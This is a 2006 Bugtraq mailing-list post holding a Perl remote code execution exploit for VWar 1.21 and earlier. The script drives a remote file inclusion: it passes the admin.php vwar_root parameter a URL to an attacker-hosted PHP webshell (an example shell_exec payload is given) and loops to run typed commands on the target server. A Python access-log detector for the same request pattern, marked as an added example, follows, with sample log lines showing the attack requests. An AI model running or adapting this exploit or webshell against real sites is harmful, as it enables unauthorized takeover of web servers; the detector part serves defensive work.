Date: 22 Apr 2006 15:48:59 -0000
From: ali@...kerz.ir
To: bugtraq@...urityfocus.com
Subject: VWar <= ver 1.21 Remote Code Execution Exploit


#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
######################################################
# VWar <= ver 1.21 Remote Code Execution Exploit     #
# usage: >>>>                                        #
# perl vwar.pl +location of VWar+ +shell Url+        #
# location example :http://raeget/modules/vwar/admin #
# cmd shell example: <?shell_exec($_GET[cmd]);?>     #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "=       vwar Exploit BY s3rv3r_hack3r     =\n";
print "=          IHST (WwW.hackerz.ir)          =\n";
print"-------------------------------------------\n\n";

$targ = $ARGV[0];
$cmdurl = $ARGV[1];

   $con=get("http://".$targ) || die "[-]Cannot connect to Host";
while ()
{

     print "Cmd@...T |\$";
     chomp($cmd=<STDIN>);


$commd=get("http://".$targ."/admin.php?vwar_root=".$cmdurl."&cmd=".$cmd)
}
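
The request pattern this script generates (admin.php called with a vwar_root parameter that points at a remote URL) can be hunted for in web-server access logs. The following detection sketch is an added example, not part of the original post; the Apache combined log format, the name find_vwar_rfi and the sample log lines are assumptions constructed for illustration, and it only sees parameters sent in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx "combined" access-log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A vwar_root value of the form scheme://... or //host instead of a local path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)


def find_vwar_rfi(lines):
    """Return one finding per request whose vwar_root parameter points off-host."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        parts = urlsplit(m.group("target"))
        # parse_qs percent-decodes values, so http%3A%2F%2F... is caught too.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("vwar_root", []):
            if REMOTE_RE.match(value):
                findings.append({
                    "line": lineno,
                    "client": m.group("ip"),
                    "path": parts.path,
                    "vwar_root": value,
                    "cmd": params.get("cmd", [None])[0],
                })
    return findings


# Constructed sample log lines (documentation addresses, example hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Apr/2006:15:50:01 +0000] "GET /modules/vwar/admin/admin.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [22/Apr/2006:15:51:12 +0000] "GET /modules/vwar/admin/admin.php?vwar_root=http://files.example/s.txt&cmd=id HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [22/Apr/2006:15:51:40 +0000] "GET /modules/vwar/admin/admin.php?vwar_root=hTtP%3A%2F%2Ffiles.example%2Fs.txt%3F&cmd=uname%20-a HTTP/1.1" 200 401 "-" "-"',
    '203.0.113.5 - - [22/Apr/2006:16:02:03 +0000] "GET /index.php?vwar_root=./ HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_vwar_rfi(SAMPLE_LOG):
        print(finding)
```

Any hit means a client tried to make the application include code from another host; the cmd field shows what it then asked that code to run.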

